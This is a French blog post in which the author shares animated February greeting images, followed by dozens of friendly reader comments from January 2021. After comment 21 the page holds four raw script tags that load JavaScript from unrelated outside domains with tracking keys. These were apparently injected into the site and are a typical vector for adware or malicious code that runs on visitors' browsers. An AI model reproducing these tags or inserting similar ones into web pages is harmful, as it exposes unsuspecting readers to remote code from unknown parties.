• Mes Créas Mois De Février pour Vous

     

     

    Mes Créas Mois De Février pour Vous

     

    { A Retrouver dans la Rubrique "Bonjour"-"Hiver,Noël" ICI }

     

     

    Nous voici dans quelques jours en Février, alors voici pour vous mes créas pour Vous

    Vous pourrez en trouver d'autres anciennes créas mais toutes aussi actuelles dans la Rubrique "Mois"-"Février" ICI

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

    { A Retrouver dans la Rubrique "Bisous"-"Hiver,Noël" ICI }

     

     

     

     

     

    Mes Créas Mois De Février pour Vous

     

    { A Retrouver dans la Rubrique "Bonne Journée"-"Hiver,Noël" ICI }

     

     


    Tags Tags : , , , , , , ,
  • Commentaires

    37
    Jeudi 28 Janvier 2021 à 08:48

    merci beaucoup pour le partage de tes jolies créations bisous liliane

    36
    Lundi 25 Janvier 2021 à 21:37

    Mes Créas Mois De Février pour Vouschère Valie et merci pour ce superbe partage.  À bientôt!

    35
    Lundi 25 Janvier 2021 à 18:51

    Coucou Valie

    Encore de magnifiques créations merci beaucoup du partage Bisous

    34
    Lundi 25 Janvier 2021 à 17:06

    Bonjour ma douce Valie

    J'espère que tu vas bien ainsi que ta fille ,ici il fait froid et il y a du vent un peu de neige de temps en temps mais qui ne tient pas .

    Bonne fin de journée ma chère amie et gros bisous

    pour vous deux

    ton amie Janine

    33
    Lundi 25 Janvier 2021 à 14:37

    Coucou ma Douce Amie...Merci pour ce superbe partage. J'espère que tu vas au mieux dans ton petit coin...Je t'envoie le soleil de cette journée.

    Plein de gros bisous pour toi et ta fille.

    A bientôt.

    Ta page est bien belle....

    32
    Lundi 25 Janvier 2021 à 09:59

    Qu'est ce qu'elles sont jolies ces créations !! On apprécierait presque d'être en hiver ! (Non, en vrai l'hiver ne me dérange pas ! lol) En tout cas bravo et merci, elles sont comme toujours très réussies et fort jolies. Mention spéciale pour celle avec les patins à glace !
    Gros Bisous

    31
    Lundi 25 Janvier 2021 à 08:44

    Bonjour Valie 

    Merci de ta gentille visite de ce matin qui me fait bien plaisir . as tu passé un doux weekend avec ta fille ? moi au chaud souvent sous ma couette malgré le beau soleil de dimanche . étant à risque je redouble de prudence . Ma tite Valie prends bien soin de toi bon début de semaine   je t'envoie toute mon amitié et des gros bisous 

    30
    Dimanche 24 Janvier 2021 à 14:35

    Super beau travail avec ces animations

    Ici c'est Dimanche sous la neige

    J'espère que tout va bien pour vous les filles et vous fait de gros bisous

    29
    Vendredi 22 Janvier 2021 à 21:57

    Merci Valie pour toutes ces propositions !!!

    Bisous et bon WE

    28
    Vendredi 22 Janvier 2021 à 20:56

    Merci pour ces belles créations

    Bisous Pierrette67

    27
    Vendredi 22 Janvier 2021 à 19:07

    Coucou ma belle Valie, merci pour ces jolis gifs pour le mois de février. Passe un beau week-end, bisou rose tendresse !

    26
    Vendredi 22 Janvier 2021 à 18:07

    Bonsoir ma chère Valie

    Bravo pour cette belle présentation de février qui arrive à grands pas!!!!

    Passe une bonne soirée et un bon week-end 

    Gros bisous tendresse

    25
    Vendredi 22 Janvier 2021 à 17:52

    Merci ma tite Valie, toujours de belles créations!

    J'espère que tout va bien !

    Bisous et belle soirée

    24
    Jacline-H-49
    Vendredi 22 Janvier 2021 à 17:05

    Cc toi !

    j'ai du mal à en choisir une, elles sont toutes si chouettes, la première est sportive finalement je préfère celle là.

    Merci d'avoir travaillé pour nous ma chère Valie. Bonne fin de ce vendredi

    GROS BISOUS TENDRESSE de 

    Jacline

     

    23
    Vendredi 22 Janvier 2021 à 14:47
    Merci Valy ! Bisous.
    22
    Vendredi 22 Janvier 2021 à 14:00
    lamanuelle25

    Mille mercis pour ces jolies créas! Bisous Nadine

    21
    mamijojo77100
    Vendredi 22 Janvier 2021 à 13:56

    que c est agreable de faire son petit marche assis dans son fauteuil.. J aime le telepherique !!

    gros bisous et bon we avec ta fifille. joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1611320123206" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    20
    Vendredi 22 Janvier 2021 à 13:44
    dane

    coucou tu as superbement travaillé , toujours très créative, minutieuse que du bonheur bravo je travaille pour toi en ce moment je ne t' en dirais pas plus lol !!! gros bisous a bientôt 

    19
    Vendredi 22 Janvier 2021 à 13:06

    Beau travail, c'est vrai que le temps passe vite.

    Bisous / Nicole

    18
    Qinoa
    Vendredi 22 Janvier 2021 à 11:45
    De belles images ♥️Déjà bientôt février, le temps passe vite
    17
    marianne pirotte
    Vendredi 22 Janvier 2021 à 11:29

    Toutes superbes tes créations, je me suis servie !!

    Gros bisous

    Marianne

    16
    Vendredi 22 Janvier 2021 à 11:26

    coucou tes gifs sont toujours aussi chouette j'adore je clic merci beaucoup 

    bisous bonne journée à toi valie 

    15
    Vendredi 22 Janvier 2021 à 11:04

    Le temps passe vraiment vitesse grand V !!!

    Merci ma tite Valie pour toutes tes créas mises à notre dispo.

    A très vite de te lire, Doux Bisous affectueux.

    14
    Vendredi 22 Janvier 2021 à 10:53

    Oh là là, déjà février... Tu me désespères lol ! Surtout qu'en février il y a la st valentin et l'anniv de mon mari... Moi je suis encore avec un autre compte-rendu a réaliser suite à un autre conseil de classe...

    Bises

    Thaly

    13
    Vendredi 22 Janvier 2021 à 10:47

    Bonjour Valie 

    Superbes créas ! tes animations sont très sympas 

    une de tes créas ou je craque c'est celle de la petite fille dans le miroir .merci mon amie pour  ce beau moment  prends bien soin de toi   . je t'envoie toute mon amitié et des gros bisous 

    12
    Vendredi 22 Janvier 2021 à 10:32

    Bonjour Valie 

    superbes créations bravo et merci

    gros bisous  

    11
    Vendredi 22 Janvier 2021 à 10:18

    Super des nouvelles créations Merci à toi , j'espère que tu vas bien et que le stage de ta fille se déroule bien. Ici beaucoup de vent et de pluie .
    Amicalement 

    Claudine

    10
    Vendredi 22 Janvier 2021 à 10:13
    Toujours de belles créations Bonne journée. Gros bisous
    9
    Jour de mai
    Vendredi 22 Janvier 2021 à 10:13

    Coucou Valie, 

    C'est vrai que Février approche très vite alors merci pour ce magnifique partage. Toujours à temps avec le froid et la neige dans tes créations. 

    Je te souhaite un excellent week end. 

    Gros bisous ♥♥♥

    LN

    8
    Vendredi 22 Janvier 2021 à 10:09

    Belle série d'images pour février!! J'aime beaucoup et merci pour le partage......

    Bisous et douce journée

    7
    Gaelle
    Vendredi 22 Janvier 2021 à 09:30
    Magnifique créas. Merci beaucoup valie
    Bonne journée à toi
    Gaelle
    6
    Vendredi 22 Janvier 2021 à 09:14

    C'est ravissant ! merci pour tes jolis partages Valie. Je vais arrêter un peu mes visites jusqu'à débit févier. Je ne suis pas très en forme. Bisous d'amitié. Prends soin de toi Valie.

    5
    Vendredi 22 Janvier 2021 à 09:13

    Hello Valie 

    Nous voilà déjà au weekend ! Les semaines passent vite 

    Plus de neige chez nous mais j'aime beaucoup tes créas ! 

    Ce sera un weekend calme !! pas de sortie , pas de courses ..;

    Gardons l'espoir que tout ira mieux dans quelques mois 

    passe un bon weekend 

    bisous , à lundi 

    4
    Vendredi 22 Janvier 2021 à 08:41

    merciii valie pour ces belles créas ! j'adore

    bisous

    3
    JO
    Vendredi 22 Janvier 2021 à 07:47

    Coucou ma Valie

    Une belle série d'images pour février toutes magnifiques.

    BRAVO ma douce et MERCI

    Bon vendredi, bon week-end, chez le temps sera beurk! beurk!!! d'après la météo

    BISOUS DOUX ♥♥♥♥♥

    JO

    2
    Vendredi 22 Janvier 2021 à 07:39

    Bonjour ma Valie, que de petites merveilles encore une fois....Merci pour ce beau partage

    Je te souhaite une bonne fin de semaine

    Bisous de Pat

    1
    Vendredi 22 Janvier 2021 à 07:36

    oh merci!!!! superbes, ça donne envie d'être déjà en février du coup ;) passe un bon week end, bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :